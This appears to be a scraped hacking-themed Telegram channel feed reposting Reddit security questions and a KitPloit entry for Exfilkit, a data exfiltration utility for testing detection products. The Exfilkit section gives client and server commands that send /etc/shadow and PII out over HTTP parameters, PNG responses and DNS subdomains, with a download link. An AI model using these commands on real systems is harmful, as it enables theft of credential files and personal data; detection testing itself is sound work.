Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Hamachi and public network...

I am a mobile employee working for a small company, I do security practices but I am still a newbie.

I connect through publics networks everyday. Of course it's a no-brainer to use a VPN in a situation like this (I use nordvpn). But I need to access company's shared recourses, so I HAVE to use Hamachi thorough separate tunneling.

Worst case scenario in my head: someone with complete access to router initiating man-in-middle attack by any attack such as malicious DNS, IP spoofing, DDoS, etc.

Any Idea how to maximize security? Any places in Hamachi an attacker can initiate?

submitted by /u/Space_Chet
[link] [comments]
HOW I GOT GOOGLE’S HALL OF FAME?

IntroductionContinue reading on Medium »
Read more...
hacking: security in practice
Hacked Via Laser on window and how to block?

I have a unique situation where I need advice on this particular form of hacking and have been advised that this particular community/reddit was the best place to seek it. I have heard of white noise generators but the room being hacked via a window is my living room and if possible, would like to still use this room without the audible white noise.

Words can't express how desperately this advice is needed. Thanks.

submitted by /u/trappop
[link] [comments]
hacking: security in practice
Maths and hacking

Hi guys,

A question for those who work in a professional capacity in this field: how much maths is required, if any, for your role as a pen tester, for example? just wondering this as some say its not necessary but some say it is if you want to be an expert then it is required, especially for cryptography. Would not being good at maths hinder ones ability to excel in the field, I guess is the main question.

Thanks

submitted by /u/BackgroundAd7155
[link] [comments]
Data exfiltration (https://www.kitploit.com/search/label/Exfiltration) utility for testing (https://www.kitploit.com/search/label/Testing) detection capabilities Description Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
/etc/shadow -> HTTP POST requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r
PII -> PNG embedded (https://www.kitploit.com/search/label/Embedded) in HTTP Response Server $ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log
Client # ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r
PII -> DNS subdomains (https://www.kitploit.com/search/label/Subdomains) querying Server # ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log
Client $ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r


Download Exfilkit (https://github.com/tasooshi/exfilkit)